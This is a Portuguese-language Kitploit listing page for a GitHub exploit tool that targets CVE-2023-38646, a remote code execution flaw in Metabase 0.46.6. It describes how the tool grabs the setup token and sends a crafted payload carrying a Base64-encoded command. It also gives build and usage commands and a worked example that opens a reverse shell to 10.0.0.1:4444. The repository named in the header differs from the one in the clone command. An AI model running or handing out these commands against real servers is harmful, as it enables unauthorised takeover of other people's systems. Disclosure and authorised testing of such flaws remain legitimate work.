Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-38646 — Exploit para CVE-2023-38646 no Metabase 0.46.6, permitindo execução remota de código por meio de requisições elaboradas e recuperação do token de configuração. | Kitploit
Ferramentas/GitHubGitHub/danithehack3r/cve-2023-38646
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoCavalo de Troia de Acesso Remoto
GitHubdanithehack3r/cve-2023-38646

CVE-2023-38646

Exploit para CVE-2023-38646 no Metabase 0.46.6, permitindo execução remota de código por meio de requisições elaboradas e recuperação do token de configuração.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-38646

Exploit para Metabase 0.46.6 CVE-2023-38646

Esta ferramenta explora uma vulnerabilidade (CVE-2023-38646) em uma plataforma de software. O exploit permite execução remota de código por meio de uma solicitação manipulada, aproveitando uma string de conexão de banco de dados tratada incorretamente.

Visão Geral

A ferramenta:

  • Obtém o token de configuração da URL alvo.
  • Codifica o comando fornecido em Base64.
  • Constrói o payload com o comando codificado.
  • Envia o payload para explorar a vulnerabilidade.

Instalação

Clone o repositório:

root@kitploit:~
git clone https://github.com/SUT0L/CVE-2023-38646.git
cd CVE-2023-38646
go build -o exploit
chmod +x exploit

Uso

root@kitploit:~
./exploit --url [TARGET_URL] --command [COMMAND] [--proxy PROXY_URL]

TARGET_URL: A URL da plataforma a ser verificada e explorada. COMMAND: O comando a ser executado no alvo. PROXY_URL (Opcional): A URL do servidor proxy (ex.: http://127.0.0.1:8080). Se não for fornecida, nenhum proxy será usado.

Exemplo com um reverse shell sh

root@kitploit:~
./exploit --url https://example.com --command 'sh -i >& /dev/tcp/10.0.0.1/4444 0>&1' --proxy http://127.0.0.1:8080

Aviso Legal

Esta ferramenta destina-se apenas a fins educacionais e de pesquisa. Sempre garanta que você tenha autorização adequada antes de verificar ou explorar qualquer alvo. O uso indevido desta ferramenta é estritamente contra a intenção do desenvolvedor e pode ser ilegal.

Feedback e Contribuições

Sinta-se à vontade para abrir issues para qualquer feedback, bugs ou solicitações de recursos. Pull requests são sempre bem-vindos!

Baixar ferramenta